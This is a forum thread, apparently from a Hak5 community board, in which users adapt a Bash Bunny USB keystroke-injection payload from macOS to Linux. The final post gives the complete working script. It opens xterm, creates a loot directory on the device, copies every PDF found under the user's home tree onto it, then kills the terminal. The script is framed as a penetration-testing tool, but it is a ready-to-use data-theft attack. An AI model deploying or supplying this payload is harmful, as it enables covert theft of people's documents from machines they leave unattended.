Jump to content

File Exfil for Linux?


Am3ience

Recommended Posts

On 2/28/2018 at 7:29 AM, Am3ience said:

Hey guys,

So there are a bunch of file exfiltration payloads for Windows on the git, but does anyone know of one for Linux? I'm trying to see if I can exfil all .docx or .pdf from a folder on linux to the Bash Bunny. Any help would be great, thanks!

Most mac payloads will work because mac uses unix. So try to use a couple of those, maybe edit one or more lines and you will be set!

Link to comment
Share on other sites

9 hours ago, C1PH3R said:

Most mac payloads will work because mac uses unix. So try to use a couple of those, maybe edit one or more lines and you will be set!

I'm looking at this really simple payload, https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/exfiltration/MacPDFExfil

 

What kind of things would i need to change for this to work for Linux?

Link to comment
Share on other sites

7 hours ago, Am3ience said:

I'm looking at this really simple payload, https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/exfiltration/MacPDFExfil

 

What kind of things would i need to change for this to work for Linux?

I will try to help, but note that I have not tested this yet

 

You will probably need to change:

line 19: QUACK CONTROL ALT t

 

 

That should work if it doesn't try to run the commands yourself and see what the error messages are.

Link to comment
Share on other sites

Like @C1PH3R said, I'd probably replace Lines 19-22 with:

RUN UNITY xterm

(for some reason I've had better luck executing commands in xterm than with terminal in Unity)

and you'll also need to change your loot_dir to something like:

/media/$USER/BashBunny/loot/XYZ

then obviously 'killall xterm' instead of terminal.

 

** Also untested

Link to comment
Share on other sites

12 hours ago, bg-wa said:

Like @C1PH3R said, I'd probably replace Lines 19-22 with:


RUN UNITY xterm

(for some reason I've had better luck executing commands in xterm than with terminal in Unity)

and you'll also need to change your loot_dir to something like:


/media/$USER/BashBunny/loot/XYZ

then obviously 'killall xterm' instead of terminal.

 

** Also untested

Yeah, this could probably work!

Link to comment
Share on other sites

Thanks guys! Managed to figure it out with your help.

For future reference if anyone else stumbles upon this thread, below is the code to exfil PDFs from Fedora, but should work in all Linux distros.

 

LED SETUP
ATTACKMODE HID STORAGE

LED ATTACK
RUN UNITY xterm
Q DELAY 1000 
Q STRING export lootdir=/run/media/\$USER/BashBunny/loot/LinuxGrabber 
Q ENTER
Q STRING mkdir -p \$lootdir
Q ENTER

# Find all PDFs stored in the user's file structure, and copy them over to the BashBunny storage.
Q STRING find . -name "*.pdf" -exec cp '{}' \$lootdir \\\;
Q ENTER 
Q STRING killall xterm
Q ENTER 

# sync the filesystem
sync

LED FINISH 

 

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...